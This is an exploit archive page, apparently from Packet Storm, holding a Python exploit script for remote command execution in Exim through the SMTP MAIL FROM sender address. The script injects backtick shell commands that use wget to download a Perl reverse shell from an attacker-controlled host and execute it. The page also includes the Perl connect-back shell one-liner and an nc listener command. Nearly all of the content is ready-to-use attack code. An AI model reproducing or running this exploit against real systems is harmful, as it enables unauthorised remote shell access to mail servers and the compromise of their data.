what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Exim sender_address Remote Command Execution

Exim sender_address Remote Command Execution
Posted Jun 5, 2013
Authored by eKKiM

Exim sender_address parameter remote command execution exploit that spawns a connect-back shell.

tags | exploit, remote, shell
SHA-256 | 9b7e5b2ab5d077019a9d4cd152be0e3cd435bd5a759bcb011ea9bf0a0ca131fb

Exim sender_address Remote Command Execution

Change Mirror Download
#!/usr/bin/env python

##################################################################################
## Exim sender_address Parameter - Remote Command Execution Exploit ##
##################################################################################
## ##
## Vulnerability found by RedTeam Pentesting GmbH ##
## https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/ ##
## ##
## Exploit written by eKKiM ##
## http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/ ##
## ##
##################################################################################
## USAGE ##
##################################################################################
## ##
## Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and ##
## upload this perl reverse shell script to a webserver. ##
## ##
## Edit the PERL_SHELL variable to your own connectback script URL ##
## ##
## Start a listener: nc -vvn -l -p CONNECT_BACK_PORT ##
## ##
## Let the exploitin begin ##
## ##
##################################################################################


####### PERL REVERSE SHELL #######
## use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
####### PERL REVERSE SHELL #######


import socket
import sys

####### URL TO YOUR CONNECTBACK SHELL #######
PERL_SHELL = "myhost.com/shell.pl"
####### URL TO YOUR CONNECTBACK SHELL #######

if len(sys.argv) != 2:
print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"
print " <target_ip> target you want to test"
print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"
exit(1)

RCPT_TO = "postmaster@localhost"
HOST = sys.argv[1]
PORT = 25

def read_line(s):
ret = ''

while True:
c = s.recv(1)

if c == '\n' or c == '':
break
else:
ret += c

return ret


if len(sys.argv) == 3:
RCPT_TO = sys.argv[2]

print "Exim sender_address Parameter - Remote Command Execution Exploit"
print "Bug discovered by RedTeam Pentesting GmbH"
print "Exploit created by eKKiM"
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

data = read_line(s);
if not(data.startswith("220")):
print "[ERROR] Is it SMTP Server?"
exit(1)

s.send("EHLO domain.local\n")
s.recv(4096)

s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n")

data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] MAIL FROM not accepted"
exit(1)

s.send("RCPT TO: " + RCPT_TO + "\n")
data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] RCPT_TO not accepted"
exit(1)

s.send("DATA\n")
data = read_line(s);
if not(data.startswith("354")):
print "[ERROR] Cannot send email content"
exit(1)

s.send("x\n.\n")
data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] email content revoked"
exit(1)

print "[OK] Recieved shell?"

s.close()

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close